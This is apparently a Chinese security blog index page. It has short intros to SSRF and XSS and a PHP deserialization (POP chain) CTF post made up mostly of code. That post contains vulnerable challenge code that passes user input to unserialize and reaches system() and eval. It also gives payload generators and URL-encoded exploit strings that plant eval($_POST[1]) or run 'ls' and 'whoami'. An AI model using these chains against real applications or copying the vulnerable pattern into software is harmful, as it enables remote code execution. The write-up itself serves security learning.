南溟NaN

在这浩瀚星河的你是什么

发表于 分类于

简介

SSRF,即Server-Side Request Forgery,中文名服务端请求伪造,是一种由攻击者构造形成由服务器端发起请求的一个漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。

简单来说,就是利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。

阅读全文 »

发表于 分类于

wakeup

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php
ini_set("error_reporting", "E_ALL &amp; ~E_NOTICE");

class A
{
    public $func;
    public $end2;

    public function __wakeup()
    {
        $this->end2 = "die";
    }

    public function __call($method, $args)
    {
        echo "begin";
    }

    public function __destruct()
    {
        $this->func = "system";
        $waf = $this->end2;
        $func = $this->func;
        $waf();
        $func($_GET["param"]);
    }
}

class B
{
    public $poc;

    public function __destruct()
    {
        $this->poc->test();
    }
}

$o = unserialize($_GET["poc"]);
print_r($o);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
<?php
error_reporting(0);
function filter($str){
    $str=str_replace("getflag",'hark',$str);
    return $str;

}
class Start{
    public $start;
    public $end;
    public function __construct($start,$end)
    {
        $this->start=$start;
        $this->end=$end;
    }
}

class Go{

    public function __destruct()
    {
        echo $this->ray;
    }


}
class Get{
    public $func;
    public $name;
    public function __get($name)
    {
        call_user_func($this->func,$name);

    }

    public function __toString()
    {
        $this->name->{$this->func};

    }

}
class Done{
    public $eval;
    public $class;
    public $use;
    public $useless;
    public function __invoke()
    {
        $this->use=$this->useless;
        eval($this->eval);
    }

    public function __wakeup(){
        $this->eval='no way';
    }
}

if(isset($_GET['ciscn_huaibei.pop'])){
    $pop=new start($_GET['ciscn_huaibei.pop'],$_GET['pop']);
    $ser=filter(serialize($pop));
    unserialize($ser);
}else{
    highlight_file(__FILE__);
}
?>

// http://172.1.14.1/pop.php?ciscn[huaibei.pop=getflaggetflaggetflaggetflaggetflaggetflag&pop=;s:3:%22end%22;O:2:%22Go%22:1:{s:3:%22ray%22;O:3:%22Get%22:2:{s:4:%22func%22;s:9:%22phpinfo()%22;s:4:%22name%22;O:3:%22Get%22:2:{s:4:%22func%22;O:4:%22Done%22:4:{s:4:%22eval%22;s:16:%22eval($_POST[1]);%22;s:5:%22class%22;N;s:3:%22use%22;R:8;s:7:%22useless%22;s:16:%22eval($_POST[1]);%22;}s:4:%22name%22;s:1:%221%22;}}}}
1
http://172.1.14.1/pop.php?ciscn[huaibei.pop=getflaggetflaggetflaggetflaggetflaggetflag&pop=;s:3:"end";O:2:"Go":1:{s:3:"ray";O:3:"Get":2:{s:4:"func";s:9:"phpinfo()";s:4:"name";O:3:"Get":2:{s:4:"func";O:4:"Done":4:{s:4:"eval";s:16:"eval($_POST[1]);";s:5:"class";N;s:3:"use";R:8;s:7:"useless";s:16:"eval($_POST[1]);";}s:4:"name";s:1:"1";}}}}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
class A
{
    public $func;
    public $end2;
}

class B
{
    public $poc;
}


$test = new A();
$test->func = &$test->end2;
print_r(serialize($test));
1
/?poc=O:1:%22A%22:2:{s:4:%22func%22;N;s:4:%22end2%22;R:2;}&param=ls
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php

class one
{
    public $object;
    public $twotwo = array(0 => "CTF");
}

class second
{
    public $filename;
}

class third
{
    private $string;

    public function __construct()
    {
        $this->string = array("string" => [new one(), "MeMeMe"]);
    }
}

$a = new one();
$b = new one();
$c = new second();
$d = new third("haha");
$b->object = $d;
$c->filename = $b;
$a->object = $c;
$n = null;
$payload = array($a, $n);
echo urlencode(serialize($payload));
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
<?php

class alpha
{
    public function __destruct()
    {
        $this->seclover->seclover();
    }
}

abstract class beta
{
    private $b = 1;

    abstract protected function eval();

    public function seclover()
    {
        var_dump($this->beta);
        ($this->beta)();
    }
}

class omega extends beta
{
    private $func;
    protected $key;

    public function __construct($func, $key)
    {
        $this->func = $func;
        $this->key = $key;
    }

    protected function eval()
    {
        if (is_array($this->key)) {
            ($this->func)($this->key);
        } else {
            die("you know noting pop?");
        }
    }
}

class dollar
{
    public $key;

    public function eval($func)
    {
        var_dump($func);
        $func($this->key);
    }
}

$d = new dollar();
$d->key = 'whoami';
$c = new dollar();
$c->key = 'system';
$a = new omega([$c, 'eval'], [$d, 'eval']);
$a->beta = [$a, 'eval'];
$b = new alpha();
$b->seclover = $a;
echo base64_encode(serialize($b));

//$a= unserialize(base64_decode($_GET['a']));

发表于 分类于

前言

XSS全称为跨站脚本攻击【Cross Site Scripting,为不与层叠样式表【Cascading Style Sheets, CSS缩写混淆,故此名为XSS

XSS恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

阅读全文 »